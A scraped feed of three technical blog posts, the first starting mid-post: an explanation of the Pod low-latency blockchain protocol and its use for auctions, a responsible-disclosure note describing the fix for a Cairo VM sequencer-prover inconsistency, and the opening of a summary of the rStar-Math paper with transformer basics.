For instance, consider payment systems, decentralized auctions, or even certain types of decentralized data stores. In these cases, the requirement is not necessarily that every transaction be totally ordered, but rather that each transaction is confirmed quickly and that some weaker ordering properties hold. This is the insight behind Pod, which we discuss in the next section.</p>
We can see that double-spending can be solved without total ordering, as explained here</a>: imagine I want to send two transactions to two different parties, Alice and Bob. Suppose that the number of validators is 3f + 1, where f is the number of Byzantine validators. I could bribe these f Byzantine validators to accept both transactions, and then I could send the one to Alice to f other validators, and Bob’s to different f validators. If 2f + 1 have to agree, there is no way I can gather acceptance for both from 2f + 1, and either my transactions don’t go through, or just one gets accepted, and the other would not receive support from honest parties.</p>
The following picture, taken from this post</a> shows the difference between total ordering and Pod:</p>
</p>
We can see that in some logs, transaction 4 could happen before transaction 3, but all lie within a prescribed range.</p>
Overview of Pod’s Design</h2>
At its core, Pod is designed to achieve transaction confirmation within 2δ latency—the physical lower bound dictated by network delays. To do this, the protocol makes a fundamental design decision: it eliminates inter-replica communication during the transaction write phase. Instead, the following process is used:</p>
    1. **Client-to-Replica Communication:** When a client submits a transaction, it sends the transaction directly to all replicas in the network. Each replica processes the transaction independently and appends it to its local log.</span></span>
    2. **Timestamping and Sequencing:** To allow clients (readers) to derive meaningful information from the separate logs maintained by each replica, the replicas attach timestamps and sequence numbers to each transaction. The timestamps have millisecond precision are non-decreasing. These values help clients determine when a transaction can be considered “confirmed.”</span></span>
    3. **Client-Side Log Aggregation:** When a client wishes to read the ledger, it collects the logs from enough replicas (typically 2/3), validates the votes (which include digital signatures), and computes values such as **rmin** , **rmax** , and **rconf** (the minimum round, maximum round, and confirmed round, respectively). From these, the client can determine a past-perfect round—denoted **rperf** , such that the reader has received all transactions that are or will be confirmed prior to this round.</span></span></code></pre>
This design, while sacrificing the strong guarantees of total-order broadcast, enables the protocol to deliver transactions with a minimal delay of 2δ. The trade-off is that the ordering of transactions is “generalized” rather than strict; that is, the protocol guarantees that transactions will be confirmed within a specific time frame, and that their associated timestamps will lie within certain bounds.</p>
Key Properties and Guarantees</h2>
Pod is engineered to deliver several critical guarantees, making it particularly well-suited for applications where low latency is essential. These properties include:</p>
    * **Transaction Confirmation within 2δ:** Every transaction written by an honest client is guaranteed to be confirmed—i.e., appear in the output of any reader—with a delay of at most 2δ.</span></span>
    * **Censorship Resistance:** Even in the presence of Byzantine replicas (nodes that deviate arbitrarily), the protocol ensures that confirmed transactions are visible to every honest reader. This is crucial in applications such as payments and auctions, where censorship or selective inclusion could have severe consequences.</span></span>
    * **Past-Perfection Property:** Pod defines a “past-perfect round” (**rperf**), which guarantees that a client is seeing all possible transactions receiving rconf ≤ rperf. More precisely, suppose client A computes rperf and, at any point in the future, client B sees a transaction confirmed with rconf ≤ rperf, then client A was already aware of that transaction at the moment it computed rperf (though he may not have seen it as confirmed at that time). In the case of auctions, past-perfection ensures that no additional bids be included after the auctioneer sees the deadline as past-perfect.</span></span>
    * **Accountability for Safety Violations:** The protocol includes mechanisms that allow for the identification of misbehaving replicas. If a safety violation occurs, the protocol can pinpoint which nodes deviated from the prescribed behavior. This accountability is enforced by the digital signatures attached to each transaction vote. Having accountability means that malicious actors can be slashed.</span></span>
    * **Flexible Transaction Timestamps:** Although different replicas may assign slightly different timestamp values to the same transaction, the protocol guarantees that the rconf for any honest client will be bounded between rmin and rmax (this is the confirmation bounds property).</span></span></code></pre>
The past-perfection and confirmation bounds ensure that parties cannot be blindsided by transactions suddenly ap-

pearing as confirmed too far in the past, and that the diﬀerent transaction timestamps stay in a certain range.</p>
How Pod Differs from Traditional Consensus</h2>
Traditional consensus protocols, such as those used in longest-chain blockchains or BFT systems, rely on extensive communication among nodes to establish a total order of transactions. In contrast, Pod’s approach is to sidestep inter-replica communication altogether during the transaction write phase. This decision is pivotal for achieving optimal latency, but it also means that the protocol must accept a weaker form of ordering.</p>
To illustrate this, consider the following contrasts:</p>
    * **Leader Election vs. Leaderless Operation:** In many blockchain systems, a leader (or sequencer) is elected to propose the next block. This leader is responsible for ordering transactions and ensuring that all nodes see the same sequence. In Pod, there is no such leader. Instead, every replica processes transactions independently and the ordering is derived by the client at read time.</span></span>
    * **Total-Order vs. Generalized Order:** Total-order broadcast protocols ensure that every node sees every transaction in the same order. Pod, on the other hand, guarantees that transactions are confirmed within a certain latency and that the order is “good enough” for applications like payments and auctions, where strict ordering is less critical.</span></span>
    * **Inter-Replica Communication Overhead:** By eliminating the need for replicas to communicate with each other, Pod dramatically reduces the communication overhead that typically limits the performance of consensus protocols. This design choice is the key to achieving 2δ latency, the best possible time-to-finality dictated by physical network delays.</span></span></code></pre>Pod-Core: The Technical Construction</h2>
The technical core of the Pod protocol (referred to as pod-core in the paper) is built around the following mechanisms:</p>
    * **Client State and Voting:** Clients maintain state that includes the most recent transaction round (mrt), sequence numbers, and a mapping of transactions to votes received from replicas. When a client submits a transaction, it waits to receive “votes” from each replica. These votes include a timestamp (ts) and a sequence number (sn) along with a digital signature.</span></span>
    * **Vote Validation and Ordering:** On receiving a vote, the client first verifies the signature to ensure authenticity. It then checks that the sequence number is as expected. If the vote passes these checks, it is incorporated into the client’s local state. Clients use the collection of votes to compute the rmin (the minimum timestamp), rmax (the maximum timestamp), and, via a median or other aggregation method, the confirmed round (rconf). This is a timestamp that is attached to a transaction that is taken as confirmed by a client and which may vary accordingly. The confirmation bounds property ensures, however, that all honest clients rconf will be bounded between rmin and rmax.</span></span>
    * **Replica Logs and Read Operations:** Replicas maintain their own logs of transactions. When a client performs a read operation, it collects these logs, validates them, and then computes a global view of the ledger that satisfies the past-perfection property. This view is then presented as the output of the read() operation.</span></span></code></pre>
By adhering to these procedures, pod-core guarantees that any transaction written by an honest client will be confirmed with minimal latency and that any attempt by Byzantine nodes to censor or reorder transactions will be detectable and, thus, accountable.</p>
The Elimination of Inter-Replica Communication</h2>
A central innovation in Pod is the removal of inter-replica communication during the write phase. Traditional consensus protocols require replicas to engage in multiple rounds of message exchanges to agree on the order of transactions. Pod circumvents this by allowing clients to broadcast their transactions directly to every replica. This design choice has several profound implications:</p>
    * **Optimal Latency:** Without waiting for replicas to coordinate with each other, the transaction’s propagation time is limited only by the physical delay of messages traveling through the network. Hence, the confirmation time is approximately 2δ.</span></span>
    * **Reduced Complexity:** By offloading the ordering responsibility to the client’s read operation, the protocol simplifies the interaction among replicas. Each replica independently timestamps and sequences transactions without needing to reconcile its state with others.</span></span>
    * **Localized Fault Isolation:** If a subset of replicas behaves maliciously, their misbehavior can be isolated and identified through the accountability mechanisms. The impact of Byzantine nodes is contained, and honest clients can still obtain a consistent view of the ledger by aggregating data from a sufficient number of honest replicas.</span></span></code></pre>
The protocol employs a streaming construction. Clients establish persistent connections with all replicas, enabling them to continuously receive “vote” messages as soon as a replica processes a transaction. This streaming nature means that rather than making isolated, one-off requests for each transaction, the client maintains an ongoing session where transaction updates—including timestamps, sequence numbers, and digital signatures—are streamed in real time. By persistently receiving this data, the client is able to immediately update its state and aggregate the votes necessary for computing parameters such as rmin, rmax, rconf, and rperf. This approach not only minimizes the overhead associated with repeatedly setting up new connections but also ensures that the client’s view of the ledger remains as current as possible, thereby contributing to the protocol’s objective of near-optimal latency. This moves from the pattern of blocks, where you have to wait until it appears to receive a confirmation, adding delay.</p>
Timestamping and the Computation of rmin, rmax, and rconf</h2>
Pod introduces a sophisticated scheme for assigning and aggregating timestamps to ensure that, even in the absence of inter-replica communication, clients can derive a coherent view of transaction ordering. The key components are:</p>
    * **rmin (Minimum Round):** The lower bound for rconf for the transaction's rconf for an honest client. Calculation given in [lines 1-13 of algorithm 3](https://arxiv.org/pdf/2501.14931).</span></span>
    * **rmax (Maximum Round):** The upper bound for rconf for the transaction's rconf for an honest client. Calculation given in [lines 14-26 of algorithm 3](https://arxiv.org/pdf/2501.14931).</span></span>
    * **rconf (Confirmed Round):** A computed value—derived as the median of the timestamps received from a quorum of replicas—that signifies when a transaction becomes confirmed. Calculation given in [lines 12-18 of algorithm 2](https://arxiv.org/pdf/2501.14931).</span></span></code></pre>
The protocol guarantees that, for any transaction, the confirmed round rconf will satisfy the bounds determined by rmin and rmax.</p>
Lemma 1</a> shows that the values of rmin, rmax will correspond to the sorted values (in increasing order) at positions $\lfloor \alpha / 2 \rfloor - \beta$ and $n - \alpha + \lfloor \alpha / 2 \rfloor + \beta$, respectively. Here $\alpha$ is the confirmation threshold and $\beta$ the resilience threshold, satisfying $n - \alpha = \beta$. If $\alpha \geq 4\beta + 1$, lemma 2 indicates that there is at least one honest replica such that its most recent timestamp is, at most, rperf. Lemmas 3 and 4 guarantee, under the same assumptions, that we have confirmation within $2\delta$ and past-perfection within $\delta$. Lemmas 5, 6 and 7 guarantee that the construction has past-perfection safety, confirmation bounds and $\beta$-accountable safety, respectively. All these results are combined to prove the security of Pod-core as stated in theorem 1.</p>
Digital Signatures and Accountability</h2>
Every transaction vote in Pod is accompanied by a digital signature. This has multiple advantages:</p>
    * **Authentication:** Clients can verify that the vote indeed comes from the claimed replica, preventing impersonation attacks.</span></span>
    * **Non-Repudiation:** Since signatures are cryptographically secure, a malicious replica cannot later deny that it sent a particular vote.</span></span>
    * **Misbehavior Detection:** If a replica sends inconsistent or out-of-order votes, these discrepancies can be detected by comparing signatures across different replicas’ logs. The identify() function in the protocol uses these digital proofs to pinpoint the source of any violation of safety properties.</span></span></code></pre>
This accountability mechanism is essential not only for security but also for enforcing economic incentives. If a replica is caught misbehaving, it can be penalized (for example, through slashing of its stake), which in turn discourages behavior that could undermine the protocol’s guarantees.</p>
Algorithms</h2>
Client (Algorithms 1, 2 and 3)</h3>
The client maintains a state consisting of all the replicas, their public keys, and lists for the most recent timestamp, and next sequence number expected by each replica, the timestamps received for each transaction by each replica and the pod observed by the client so far.</p>
After initialization (steps 7-14 of algorithm 1), the client could try to send a transaction to be included. To that end, the client sends it to all the replicas (steps 1-5 of algorithm 2). Upon reception, honest replicas will answer back with their vote. Every time the client receives a vote, the client (steps 15 - 24, algorithm 1):</p>
    1. will verify the signature (step 16, returning if invalid).</span></span>
    2. checks whether the serial number corresponds to the expectec (step 17, returning if the vote cannot be processed).</span></span>
    3. updates the corresponding next sequence number (step 18).</span></span>
    4. ensures that the timestamp is not less than the mrt (step 19, returning in case it's a previous timestamp).</span></span>
    5. updates the mrt (step 20) and checks whether the transaction is a heartbeat (step 21, doing nothing else for a heartbeat).</span></span>
    6. checks for duplicate timestamps (step 22, returning if there is a duplicate).</span></span>
    7. adds the timestamp for the transaction in the log corresponding to the replica (step 23).</span></span></code></pre>
The client can afterwards perform a read operation, following the steps 6 to 28 in algorithm 2:</p>
    1. Initializes transaction and additional information (step 7)</span></span>
    2. Loops over all transactions in the pod (steps 8 - 21),</span></span>
    * Computes rmin and rmax (steps 9 and 10) and sets rconf to bottom, as well as setting the timestamps and additional information to empty (step 11).</span></span>
    * If there is a quorum (checking that there are at least $\alpha$ valid signatures), the client gets the timestamps (step 14), appends them to the timestamps (step 15), appens the vote to the additional information (step 16), and computes the rconf for the transaction as the median (step 18) and appends the transaction to the transation log (step 20).</span></span>
    3. Computes the rperf (step 22).</span></span>
    4. Appends the message votes for mrt for each replica (step 24).</span></span>
    5. Assembles the pod from the information (transactions, rperf and additional information) and returns the pod (steps 26-27).</span></span></code></pre>
Algorithm 3 is concerned with the computation of median (33-35) and minimum (1-13), maximum (14-26) and minimum estimated next timestamps (27-32).</p>
Replica (Algorithm 4)</h3>
The replica contains a list of all connected clients, the next sequence number, its log and has a function to return the clock time of the replica (lines 1-4). The replica initializes with clean log and no connections (5-7). At the end of each round, the replica sends a hearbeat to each connection (26-28).</p>
Whenever a client connects to the replica, it adds the client to the connected client list (9) and sends all votes to the client (10-12). If a client wants to perform a write, first the replica checks whether it is not a duplicate (15, returning if it is a duplicate) and sends back a vote.</p>
The vote is performed in the following way:</p>
    1. The replica gets the timestamp, next serial number and signs a messages with the transaction, the timestamp and serial number (step 19).</span></span>
    2. The replica appends the transaction to its log, if valid (20).</span></span>
    3. The replica sends the vote to all the clients (21-23)</span></span>
    4. The replica updates the next serial number, increasing it by 1 (24).</span></span></code></pre>Extensions</h2>
Pod-core is very simple core, where clients can read and write, and replicas keep logs of transactions and vote. There are extensions from traditional databases that we can use to enhance performance or allow additional features. The extensions are added in a trust-minimized way, so that the security of the network relies on the security of pod-core.</p>
We can use secondaries, separating the computers handling the read and write instructions. The secondaries are untrusted, read-only nodes that serve the requests from clients. They receive signed updates from write nodes (validators), keep them cached, and forward them to suscribed nodes. They do not sign any messages and the only thing they could do is stop responding. In that case, the user just switches to another secondary for the same validator.</p>
Even though the reads are no longer handled by the validators, clients need to send their writes to all the validators, which is neither practical nor economical. We can solve this by incorporating untrusted gateways, which maintain an open connection to all validators. When clients want to submit a transaction, they reach the gateway and it then forwards to all validators, receives the signatures back, assembles a certificate consisting of at least $\alpha$ signatures and sends everything back to the client. Gateways do not sign transactions and, if they refuse to send transactions, the client may switch to another.</p>
We can also reduce the amount of data storage by active validators using Merkle Mountain Ranges, reducing the requirements to run a validator, which, in turn, helps in increasing the decentralization of the network.</p>
Implications for Blockchain Design</h2>
For blockchain designers, the key takeaway is that any system optimized solely for high TPS may still fall short if its consensus mechanism introduces significant delays. Pod’s design philosophy—achieving optimal latency (2δ) through a consensusless, client-driven approach—addresses this by focusing on the true metric of performance: time-to-finality.</p>
In practical terms, this means that blockchain systems need to:</p>
    * **Optimize for Low Latency:** Rather than simply increasing the number of transactions that can be processed per second, developers should strive to reduce the number of communication rounds required for consensus.</span></span>
    * **Minimize Overhead:** Eliminating unnecessary inter-node communication (as Pod does) can lead to dramatic improvements in confirmation times.</span></span>
    * **Reevaluate Throughput Metrics:** Marketing a blockchain based solely on TPS can be misleading; metrics such as average confirmation time and the worst-case time-to-finality are more indicative of real-world performance.</span></span></code></pre>Real-Time Auctions and the Limitations of Leader-Based Consensus</h2>
Another critical application domain where consensus latency plays a central role is that of real-time auctions. Traditional blockchains are ill-suited for auctions because of inherent delays and vulnerabilities associated with leader-based ordering. In this section, we explore the challenges that auctions face in blockchain environments and how alternative consensus approaches can provide a better foundation for auction applications.</p>
Auctions in the Blockchain Ecosystem</h2>
Auctions have long been a cornerstone of economic activity—from art sales to spectrum auctions—and have found numerous applications in the blockchain space:</p>
    * **MEV (Maximal Extractable Value):** On Ethereum, there are auctions where block builders compete for the right to capture extra value through transaction ordering.</span></span>
    * **Decentralized Finance (DeFi):** Protocols like CowSwap, UniswapX, and dYdX employ auction mechanisms to determine optimal order flows and to settle trades.</span></span>
    * **Liquidation Auctions:** Lending protocols such as MakerDAO and Aave rely on auctions to liquidate collateral when borrowers fall below required thresholds.</span></span>
    * **Sequencing Rights:** Emerging systems like Espresso auctions share sequencing rights among multiple Layer 2 (L2) solutions, attempting to maximize throughput and fairness.</span></span></code></pre>
Despite these varied applications, the common thread is that the auction outcome depends critically on the ordering of bids and the rapid inclusion of all valid bids before a deadline.</p>
Vulnerabilities of Leader-Based Consensus in Auctions</h2>
Most blockchains today rely on a leader-based architecture where one node (or a small group of nodes) is entrusted with proposing the next block. This design, while effective for ensuring global consensus, introduces several vulnerabilities in auction scenarios:</p>
    * **Censorship:** A leader has the power to censor transactions. In an auction, a leader might suppress competing bids to ensure that a colluding party wins the auction.</span></span>
    * **Last-Look Attacks:** In a leader-based system, a malicious leader can wait until the deadline to observe the current set of bids, then insert its own bid that is just slightly higher. This “last-look” strategy can subvert the fairness of the auction.</span></span>
    * **Delayed Finality:** The multiple rounds required for consensus in traditional systems can lead to delays that are unacceptable for real-time auctions. If bids are finalized too slowly, the auction outcome may not reflect the true state of the market at the moment of settlement.</span></span></code></pre>A Consensusless Approach for Auctions</h2>
Given the shortcomings of leader-based consensus for auctions, the pod protocol presents a promising alternative. By eliminating the need for inter-replica communication during the transaction write phase, Pod can:</p>
    * **Reduce Finality Delays:** With a target of 2δ latency, auctions can be concluded almost in real time, making them suitable for high-frequency and high-stakes bidding.</span></span>
    * **Mitigate Censorship and Reordering:** Since there is no single leader with unilateral control over the ordering of transactions, the risk of censorship or last-look manipulation is greatly reduced.</span></span>
    * **Enable Local Computation of Auction Outcomes:** In Pod, clients (or auctioneers) can collect the logs from various replicas and compute the set of bids. Since the ordering is not strictly enforced globally, the auction outcome is derived from the aggregated bid set—a process that is inherently more robust against adversarial manipulation.</span></span></code></pre>
The “past-perfection” property of Pod ensures that once bids are confirmed, they remain in the ledger permanently. This is particularly important for auctions, where the integrity of the bid set is paramount.</p>
Benefits for Decentralized Auctions</h2>
Transitioning to a consensusless model for auctions offers several compelling benefits:</p>
    * **Faster Settlement:** Auctions can be resolved in near real time, enhancing user experience and enabling new business models such as flash auctions or real-time bidding for digital advertising.</span></span>
    * **Fairer Outcomes:** By removing the centralized role of the block proposer, the auction system becomes less prone to manipulation, ensuring that all valid bids are considered equally.</span></span>
    * **Enhanced Accountability:** Any attempt to censor or manipulate bids can be traced to specific replicas, ensuring that misbehavior is detectable and punishable.</span></span></code></pre>
These features not only improve the functioning of existing auction mechanisms but also open up possibilities for innovative auction-based applications that require extremely low latency and high fairness.</p>
Summary</h2>
The landscape of blockchain technology is undergoing a profound transformation. Traditional consensus protocols, which have served as the backbone of early blockchain systems, are being reimagined to meet the demands of modern applications that require both high throughput and ultra-low latency. In this post, we have explored several ideas:</p>
    * **Pod’s Novel Approach:** By eliminating inter-replica communication during transaction submission and leveraging client-side aggregation of replica logs, Pod achieves transaction confirmation within the physical lower bound of 2δ. This design not only minimizes latency but also enhances censorship resistance and accountability.</span></span>
    * **Reevaluating Blockchain Performance:** The oft-cited metric of TPS (transactions per second) does not capture the true performance of a blockchain. Instead, time-to-finality—the time it takes for a transaction to be irrevocably confirmed—is an additional measure.</span></span>
    * **Challenges in Real-Time Auctions:** Leader-based consensus protocols have inherent vulnerabilities that make them unsuitable for applications such as real-time auctions. By adopting a consensusless model, as demonstrated by Pod, these applications can achieve rapid confirmation and mitigate risks such as censorship and last-look attacks.</span></span></code></pre>


Responsible disclosure: A potential sequencer-prover inconsistency in the Cairo VM
Unknown — Fri, 07 Feb 2025 00:00:00 +0000
Overview</h2>
On Sunday, January 26th, Starkware informed us that they had found a critical issue in the Cairo VM</a> related to a program that would successfully execute on the VM but would violate the AIR constraints. The bug was found while investigating a separate issue reported by a third party and a fix was already implemented in a PR. The PR was merged, and a release was cut, which is already updated. You can read Starkware’s disclosure post here</a>.</p>
Technical Implementation</h3>
The fix in pull request #1925</a> adds two changes:</p>
    * Additional verification while decoding instructions</span></span>
    * Additional verification on `verify_secure_runner`.</span></span></code></pre>Instruction Decoding**: Call Instruction**</h4>
The call instruction does roughly the following:</p>
    1. Saves the current frame pointer to `[ap]`</span></span>
    2. Saves the call return address to `[ap + 1]`</span></span>
    3. Updates both `fp` and `ap` to `ap + 2`, skipping over the saved data.</span></span>
    4. Updates the `pc` to the start of the target function</span></span></code></pre>
As some of the flags of the call instruction are fixed, we can verify that:</p>
    * The `dst` register holds `ap+0`, where the current frame pointer will be stored.</span></span>
</span>
dst_register == AP</span></span>
dst_offset   == 0</span></span>
</span>
</span>
    * The `op0` register holds `ap+1`, where the call return address will be stored.</span></span>
</span>
op0_register == AP</span></span>
op0_offset   == 1</span></span>
</span>
</span>
    * Both `fp` and `ap` are updated to `ap+2`:</span></span>
</span>
ap_update == Add2</span></span>
fp_update == APPlus2</span></span></code></pre>
If these conditions are not met, the decoding fails.</p>
Instruction Decoding**: Return Instruction**</h4>
The return instruction does roughly the following:</p>
    1. Restores the previous frame pointer (at `[fp - 2]`)</span></span>
    2. Jumps to the call return address (at `[fp - 1]`)</span></span></code></pre>
As some of the flags of the return instruction are fixed, we can verify that:</p>
    * The program counter is updated with an absolute jump</span></span>
</span>
pc_update == Jump</span></span>
</span>
</span>
    * The jump location is taken from `res`, which equals `fp-1`:</span></span>
</span>
res_logic   == Op1</span></span>
op1_offset  == -1</span></span>
op1_address == FP</span></span>
</span>
</span>
    * The next frame pointer is taken from `dst`, which equals `fp-2`</span></span>
</span>
fp_update    == Dst</span></span>
dst_register == FP</span></span>
dst_offset   == -2</span></span></code></pre>
If these conditions are not met, the decoding also fails.</p>
Conditional Jump</h4>
This PR also enforces that when pc_update</code> is equal to 4</code> (conditional jump), then res_logic</code> must equal 0</code> (which implies ignoring that field).</p>

This behavior is documented in the Cairo Whitepaper, page 33:</p>
</blockquote>
if pc_update == 4:</span></span>
    if res_logic == 0 && opcode == 0 && ap_update != 1:</span></span>
        res = Unused</span></span>
    else:</span></span>
        Undefined Behavior</span></span></code></pre>Secure runner verification</strong></h4>
The verify_secure_runner</code> function verifies that the completed run in a runner is safe to be relocated and used by other Cairo programs.</p>
The PR verifies that the final frame pointer coincides with the caller’s frame pointer, stored at [initial_frame_pointer - 2]</code>.</p>
    * When using `ExecutionMode::ProofModeCanonical`, the whole address must match.</span></span>
    * When using `ExecutionMode::RunnerMode`, only the offset must match.</span></span></code></pre>Impact Analysis</h3>
As noted in Starkware’s release</a>:</p>

”Since the missing check was in the sequencer and not the prover this has no implication whatsoever on the correctness or security of Starknet. In theory, it could have created a situation that a transaction that appears to have passed will later be reverted (reorg)”</p>
</blockquote>
the main risk was having transactions from Cairo0</code> contracts execute on the sequencer and revert instead of being proved. Since the transaction would not pass the prover there is no risk of incorrect transaction being proved but the revert would impact user experience.</p>
Conclusion</h2>
As we’ve stated before, issues such as this one are always possible and likely in complex software and highlight the importance of having multiple teams paying attention to security, close collaboration between them, having simple codebases, and scrutinizing the interactions between components.</p>
Many thanks to Starkware for the notice and quick fix!</p>


Summary on rStar-Math: showing how smaller LLMs can outperform bigger ones with deep thinking
Unknown — Tue, 28 Jan 2025 00:00:00 +0000
TL;DR</strong> : this post addresses the paper introducing rStar-Math</a> and the techniques for smaller language models to outperform more complex large language models on math-related tasks. You can check the code here</a>. rStar-Math significantly improved the math reasoning abilities of SLMs. For instance, on the MATH benchmark, it enhanced Qwen2.5-Math-7B’s performance from 58.8% to 90.0% and Phi3-mini-3.8B’s from 41.4% to 86.4%, surpassing OpenAI’s o1-preview model. Additionally, on the USA Math Olympiad (AIME), rStar-Math solved an average of 53.3% of problems, ranking among the top 20% of high school math students.</p>
Introduction</h2>
Large Language Models (LLMs) are advanced artificial intelligence systems designed to understand, generate, and manipulate human language. They are trained on extensive datasets comprising billions of words, enabling them to perform a wide range of language-related tasks.</p>
Key Characteristics of LLMs:</strong></p>
    * **Scale:** LLMs contain many parameters ranging from millions to billions, allowing them to capture intricate patterns and nuances in language.</span></span>
    * **Training Data:** These models are trained on diverse and extensive text corpora, including books, articles, websites, and other textual sources, providing them with a broad understanding of language usage across different contexts.</span></span>
    * **Capabilities:** LLMs can perform various tasks such as text generation, translation, summarization, question-answering, and more, often with human-like proficiency.</span></span></code></pre>
Underlying Architecture:</strong></p>
Most LLMs are built upon the Transformer architecture</a>, introduced in 2017. This architecture uses self-attention to process and generate language efficiently, enabling models to consider the context of words in a sentence and capture long-range dependencies. One great advantage of transformers is that learning transfer can be very effective. Thus, we can train a model using large amounts of data and then train it in some other tasks using fine-tuning. An LLM that can be adapted to solve multiple different tasks is known as a foundational model. To process data, it must be first transformed into a sequence of tokens.</p>
Most state-of-the-art LLM use the decoder part of the transformer, stacked several times (for example, 24, 48, 72, 100, etc). Each decoder contains the following elements:</p>
    * **Masked self-attention** : A multi-head attention sub-layer with a causal mask to ensure tokens cannot attend to future positions (we will explain these terms soon).</span></span>
    * **Feed-forward network** : A position-wise two-layer MLP with a nonlinearity.</span></span>
    * **Residual Connections** and **Layer Normalization** around each sub-layer.</span></span></code></pre>
A minimal schematic for decoder layer $m$ is:

$\mathbf{H_{ att }}^m = \mathrm{MHA}( \mathbf{H}^{m - 1 })$</p>
$\mathbf{H_{addnorm}}^m = \mathrm{Layer Normalization}(\mathbf{H}^{m - 1} + \mathbf{H_{att}}^m)$</p>
$\mathbf{H_{ffn}}^m = \mathrm{FFN} (\mathbf{H_{addnorm}}^m)$</p>
$\mathbf{H}^m = \mathrm{Layer Normalization}( \mathbf{H_{addnorm }}^m + \mathbf{H_{ffn}}^m)$

MHA denotes the multi-head attention function, LayerNormalization is the normalization function, and FFN is the feed-forward neural network.</p>
The attention works by relating three elements: keys, queries, and values, which come from suitable transformations of the layer inputs. These transformations are linear, and the elements of the matrices should be learned by the model:

$\mathbf{Q} = \mathbf{H}^{m - 1} W_Q$

$\mathbf{K} = \mathbf{H}^{m - 1} W_K$

$\mathbf{V} = \mathbf{H}^{m - 1} W_V$</p>
The attention mechanism compares the keys and queries to find the best value match. One way to find a correlation between two vectors is via the cosine of the angle formed by queries and keys,

$$\cos (\theta) = \frac{\mathbf{Q^t} \mathbf{K}}{\lVert\mathbf{Q} \rVert \lVert \mathbf{K} \rVert}$$

The scalar product between two vectors shows how correlated they are. In LLMs, we use the softmax function, which ensures that the activations will be positive and, at most 1:

$$a_{nm} = \frac{\exp(x_n^t x_m )}{\sum \exp(x_n^t x_l )}$$</p>
There are two necessary adjustments to attention: scaling and causality. The first one is needed to rescale the arguments of the softmax function and avoid getting vanishingly small gradients. Causality ensures that a token cannot attend to future tokens so that the model can only use current or previous tokens, enabling autoregressive generation. Thus,

$\mathbf{H}_{att,s} = \mathrm{attention}(\mathbf{Q}, \mathbf{K}, \mathbf{V}) = \mathrm{softmax}\left( \frac{\mathbf{Q} \mathbf{K}^t}{\sqrt{d_k}} + \mathbf{M} \right) \mathbf{V}$

where $\mathbf{M}$ is the mask, which makes all the positions where a token should not attend future tokens equal to $- \infty$ (so that when we apply the softmax function, those elements are equal to zero). $d_k$ is the length of the key vector.</p>
The multi-head attention function has $h$ different heads (each with its key, query, and value matrices). It concatenates the results of each head (basically gluing them one after the other) and applies a matrix $\mathbf{W}^o$,

$head_i = \mathrm{attention}(\mathbf{H}^{m - 1} \mathbf{Q}^i , \mathbf{H}^{m - 1} \mathbf{K}^i , \mathbf{H}^{m - 1} \mathbf{V}^i )$

$H_{att} = \mathrm{concatenate} \left( head_1 , head_2 , \dots head_h \right) \mathbf{W}^o$</p>
After attention and normalization, each token’s representation goes through a position-wise</strong> MLP</a> (applied identically to each sequence position, hence “position-wise”):</p>
$$

\mathbf{z} = \mathbf{h} , W_1 + \mathbf{b}_1,

\quad

\mathbf{z}’ = \sigma(\mathbf{z}),

\quad

\mathbf{h}’ = \mathbf{z}’ , W_2 + \mathbf{b}_2,

$$

where:</p>
    * $\mathbf{h} \in \mathbb{R}^{d}$ is a single token’s representation from the attention sub-layer.</span></span>
    * $W_1 \in \mathbb{R}^{d \times d_{\text{ff}}}$, $W_2 \in \mathbb{R}^{d_{\text{ff}} \times d}$.</span></span>
    * $\sigma$ is typically a **GELU** (Gaussian error linear unit) or **ReLU** ([rectified linear unit](https://en.wikipedia.org/wiki/Rectifier_\(neural_networks\))) nonlinearity (activation function).</span></span>
    * This is done for each position independently, so in matrix form:  </span></span></code></pre>
$$\text{FFN}(\mathbf{H}) ;=; \max\bigl(0,,\mathbf{H},W_1 + \mathbf{b}_1\bigr),W_2 + \mathbf{b}_2.$$</p>
Before reading text or images, they have to be transformed into tokens. Let the input be a sequence of tokens:

$(x_1, x_2, \dots, x_T),$

where each $x_i$ is an integer index into a vocabulary. We map each $x_i$ to a d</strong> -dimensional embedding vector:

$\mathbf{E}(x_i) \in \mathbb{R}^d.$

Thus, the input sequence is transformed into an embedding matrix:

$\mathbf{X} ;=;

\bigl[

\mathbf{E}(x_1);, \mathbf{E}(x_2);, \ldots; ,\mathbf{E}(x_T)

\bigr]

;\in; \mathbb{R}^{T \times d}.$</p>
A decoder-only Transformer must still encode the notion of sequence position. Common methods include:</p>
    * **Learned positional embeddings** : A trainable $\mathbf{P}(i) \in \mathbb{R}^d$ for each position $i$.</span></span>
    * **Sinusoidal (original Transformer)** :  </span></span></code></pre>
$$

\begin{aligned}

\text{PE}(i,,2k) &= \sin\Bigl(\tfrac{i}{10000^{2k/d}}\Bigr),\quad

\text{PE}(i,,2k+1) = \cos\Bigl(\tfrac{i}{10000^{2k/d}}\Bigr).

\end{aligned}

$$
* Rotary Positional Embeddings (RoPE)</strong> : A rotation in the query/key space (commonly used in GPT-NeoX, LLaMa, etc.).</p>
Either way, the next step is typically:

$\mathbf{H}^{(0)} = \mathbf{X} ;+; \mathbf{P},$

where $\mathbf{P}$ indicates the positional information (shape $\mathbb{R}^{T \times d}$, same as $\mathbf{X}$).</p>
Applications:</strong></p>
    * **Natural Language Processing (NLP):** LLMs enhance various NLP tasks, including sentiment analysis, entity recognition, and language translation.</span></span>
    * **Content Creation:** They assist in generating articles, reports, and even creative writing, aiding authors and content creators.</span></span>
    * **Customer Service:** LLMs power chatbots and virtual assistants, providing human-like interactions in customer support scenarios.</span></span></code></pre>
Challenges and Considerations:</strong></p>
Despite their impressive capabilities, LLMs face challenges such as:</p>
    * **Resource Intensity:** Training and deploying LLMs require substantial computational resources, making them accessible primarily to large organizations.</span></span>
    * **Ethical Concerns:** Issues like the generation of biased or inappropriate content and the potential for misuse necessitate careful consideration and responsible deployment.</span></span>
    * **Interpretability:** Understanding the decision-making process of LLMs can be complex, raising concerns about transparency and trustworthiness.</span></span></code></pre>
In general, one would expect that the quality of the responses and LLM capabilities should be higher, given a greater set of parameters. The problem with this approach is that models become prohibitively expensive to train and fine-tune and cannot be run locally by users. The paper shows how a smaller LLM can outperform more powerful LLMs by using deep thinking and using the following concepts and ideas:</p>
    * **Code-Augmented Chain-of-Thought (CoT) Data Synthesis** : This method generates step-by-step verified reasoning trajectories by performing extensive Monte Carlo Tree Search (MCTS) rollouts. These trajectories are used to train the policy smaller language model (SLM), ensuring it learns accurate and logical reasoning steps.</span></span>
